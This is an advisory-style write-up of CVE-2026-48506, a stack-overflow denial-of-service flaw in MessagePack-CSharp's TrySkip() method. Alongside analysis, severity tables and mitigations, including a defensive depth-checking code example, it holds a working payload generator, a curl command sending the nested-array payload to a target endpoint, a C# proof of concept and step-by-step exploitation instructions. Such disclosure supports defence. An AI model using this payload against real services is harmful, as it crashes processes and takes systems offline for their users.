How CVE-2026-48506 Works
MessagePack-CSharp is a high-performance MessagePack serializer for .NET. Prior to versions 2.5.301 and 3.1.7, the `MessagePackReader.TrySkip()` method contains a critical flaw: it recursively descends into nested arrays and maps without incrementing the reader depth or invoking the configured depth checks. This directly bypasses `MessagePackSecurity.MaximumObjectGraphDepth`, the library’s documented protection mechanism against deeply nested object graphs.
The `Skip()` method is widely used by generated and dynamic formatters when they encounter unknown map keys, unknown array members, ignored fields, or any data that should be skipped for forward compatibility. An attacker can craft a MessagePack payload containing thousands of nested single‑element arrays or maps and place it in a location that the formatter will skip (e.g., an unknown field). When the formatter calls `reader.Skip()` on this attacker‑controlled value, `TrySkip()` recursively traverses every level of nesting without any depth accounting.
Because the recursion is unbounded, it rapidly exhausts the process stack and triggers a `StackOverflowException`. In .NET, `StackOverflowException` is uncatchable – it cannot be handled with a `try-catch` block – so the entire host process terminates immediately. This creates a reliable denial‑of‑service vector.
The attack requires no authentication and can be launched remotely by sending a crafted MessagePack payload to any application endpoint that deserializes untrusted data. `MessagePackSecurity.UntrustedData` does not mitigate this issue because the skip path does not participate in depth accounting. The vulnerability is tracked as CWE‑674 (Uncontrolled Recursion) and has been assigned a CVSS v3.1 base score of 7.5 (High).
DailyCVE Form:
Platform: MessagePack-CSharp
Version: <2.5.301,<3.1.7
Vulnerability: Uncontrolled Recursion
Severity: High (CVSS 7.5)
Date: 2026-06-22
Prediction: Patch already released (2026-06-09)
What Undercode Say
Analytics
| Metric | Value |
|---|---|
| CVSS v3.1 Base Score | 7.5 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Impact (Availability) | High (process crash) |
| CWE | 674 – Uncontrolled Recursion |
| Affected Versions | All < 2.5.301 and < 3.1.7 |
| Fixed Versions | 2.5.301, 3.1.7 |
| Patch Release Date | 2026-06-09 |
Bash Commands – Testing for Vulnerability
```bash
# Generate a malicious MessagePack payload with 10,000 nested single-element arrays
# (MsgPack format: array of length 1 repeated N times)
python3 -c "
# 0x91 = fixarray(1), 0xC0 = nil
payload = b'\x91' * 10000 + b'\xC0'
with open('payload.msgpack', 'wb') as f:
    f.write(payload)
"

# Send the payload to a vulnerable endpoint (example using curl)
curl -X POST http://target/api/deserialize \
  -H "Content-Type: application/x-msgpack" \
  --data-binary @payload.msgpack

# Monitor for process termination (Linux)
watch -n 1 'ps aux | grep dotnet | grep -v grep'
```

```powershell
# Check if the application crashed (Windows PowerShell)
Get-Process -Name "your-app" -ErrorAction SilentlyContinue
```
C# Code – Proof of Concept
```csharp
using MessagePack;
using System;

// Deserialization with default options (vulnerable prior to patch)
var options = MessagePackSerializerOptions.Standard;
// GenerateNestedSkipPayload() is a helper the page does not define
byte[] maliciousPayload = GenerateNestedSkipPayload(); // 10k nested arrays
try
{
    // This call will trigger unbounded recursion in TrySkip()
    var obj = MessagePackSerializer.Deserialize<TestClass>(maliciousPayload, options);
}
catch (Exception ex)
{
    // StackOverflowException cannot be caught here – process will crash
    Console.WriteLine($"Caught: {ex.Message}");
}

// Vulnerable formatter that skips unknown fields
// (in C#, type declarations must follow top-level statements)
[MessagePackObject]
public class TestClass
{
    [Key(0)]
    public int Id { get; set; }
    // Attacker will send extra data that triggers Skip()
}
```
Exploit
An attacker can exploit this vulnerability by sending a MessagePack payload where a skipped field contains a deeply nested structure. The exploitation steps are:
1. Identify a vulnerable endpoint – Any service that deserializes MessagePack data using an affected version and uses formatters that call `reader.Skip()` on unknown fields.
2. Craft the payload – Create a MessagePack document with a known field (to satisfy the formatter) and an unknown field whose value is a single‑element array or map nested thousands of times deep. The nesting depth only needs to exceed the stack size (typically a few thousand frames on .NET).
3. Deliver the payload – Send the payload via HTTP, WebSocket, or any other transport that accepts MessagePack.
4. Trigger the crash – When the formatter encounters the unknown field, it calls `reader.Skip()`, which recursively descends the nested structure without depth checks, causing a `StackOverflowException` that terminates the process.
No special resolver, compression mode, or authentication is required. The attack is reliable and can be repeated to keep the service offline.
Protection
Recommended Action: Upgrade to a patched version immediately.
| Release Line | Fixed Version |
|---|---|
| 2.x | 2.5.301 or later |
| 3.x | 3.1.7 or later |
If immediate upgrade is not possible:
- Custom depth validation – Implement application‑level logic that validates the nesting depth of incoming MessagePack data before passing it to the serializer. Reject payloads that exceed a safe threshold.
- Strict schema validation – Validate incoming MessagePack against a strict schema outside the library, rejecting any unknown fields or extra values before the serializer sees them. This reduces the attack surface but does not eliminate it if the formatter still skips valid fields.
- Monitoring and auto‑restart – Deploy a watchdog that detects process termination and automatically restarts the service to reduce downtime.
- Reduce message size limits – While not a complete fix, limiting the maximum accepted message size can increase the cost of exploitation.
The vendor fix modifies `TrySkip()` to either:
- Use iterative traversal instead of recursion, or
- Apply the existing depth accounting to arrays and maps encountered during skip operations, throwing a catchable `MessagePackSerializationException` when the depth limit is exceeded.
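
The "custom depth validation" mitigation listed above can be written as an iterative pre-scan that tracks open arrays and maps on an explicit, heap-allocated stack instead of recursing. This is an added example, not code from MessagePack-CSharp or its patch; `MsgPackDepthGuard` and `IsWithinDepth` are hypothetical names, and the code relies only on the library's public `MessagePackReader` API.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using MessagePack;

public static class MsgPackDepthGuard   // hypothetical helper name
{
    // True only if the buffer is well-formed and no array or map is nested
    // deeper than maxDepth. Open containers live on a heap-allocated stack,
    // so hostile nesting cannot consume the thread's call stack.
    public static bool IsWithinDepth(ReadOnlyMemory<byte> data, int maxDepth)
    {
        var reader = new MessagePackReader(data);
        var open = new Stack<long>();   // values still expected per open container
        try
        {
            while (!reader.End)
            {
                // The next value fills one slot of the innermost open container.
                if (open.Count > 0) open.Push(open.Pop() - 1);

                switch (reader.NextMessagePackType)
                {
                    case MessagePackType.Array:
                        open.Push(reader.ReadArrayHeader());
                        break;
                    case MessagePackType.Map:
                        open.Push(2L * reader.ReadMapHeader());   // key + value
                        break;
                    default:
                        reader.Skip();   // scalar, string, binary, extension: no recursion
                        break;
                }
                if (open.Count > maxDepth) return false;

                // Close every container whose last element was just consumed.
                while (open.Count > 0 && open.Peek() == 0) open.Pop();
            }
            return open.Count == 0;   // unfilled slots mean truncated input
        }
        catch (Exception ex) when (ex is EndOfStreamException || ex is MessagePackSerializationException)
        {
            return false;   // malformed or truncated: reject before deserializing
        }
    }
}
```

Call it on the raw message bytes before `MessagePackSerializer.Deserialize` and reject the request when it returns false; a `maxDepth` no higher than the configured `MessagePackSecurity.MaximumObjectGraphDepth` keeps the two limits consistent.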
Impact
- Denial of Service (DoS) – The vulnerability allows a remote, unauthenticated attacker to crash the application process reliably.
- Process termination – Because `StackOverflowException` is uncatchable in .NET, the entire host process terminates immediately, affecting all users of that process.
- Wide attack surface – Many generated and dynamic formatters call `reader.Skip()` when encountering unknown map keys, unknown array members, ignored fields, or data skipped for forward compatibility. This makes the vulnerability reachable during normal object deserialization.
- No authentication required – The attack can be launched remotely without any credentials.
- No special configuration needed – The attacker does not need to target a specific resolver or compression mode.
- Critical for public-facing services – Any application that accepts untrusted MessagePack payloads (e.g., APIs, microservices, game servers) is at high risk of being taken offline repeatedly.
CVE-2026-48506 is tracked separately from other MessagePack‑CSharp vulnerabilities (e.g., CVE‑2026‑48513 for DynamicUnionResolver depth bypass, CVE‑2026‑48502 for DateTime stack allocation) because it is independently fixable in the skip traversal implementation.
Sources:
Reported By: github.com

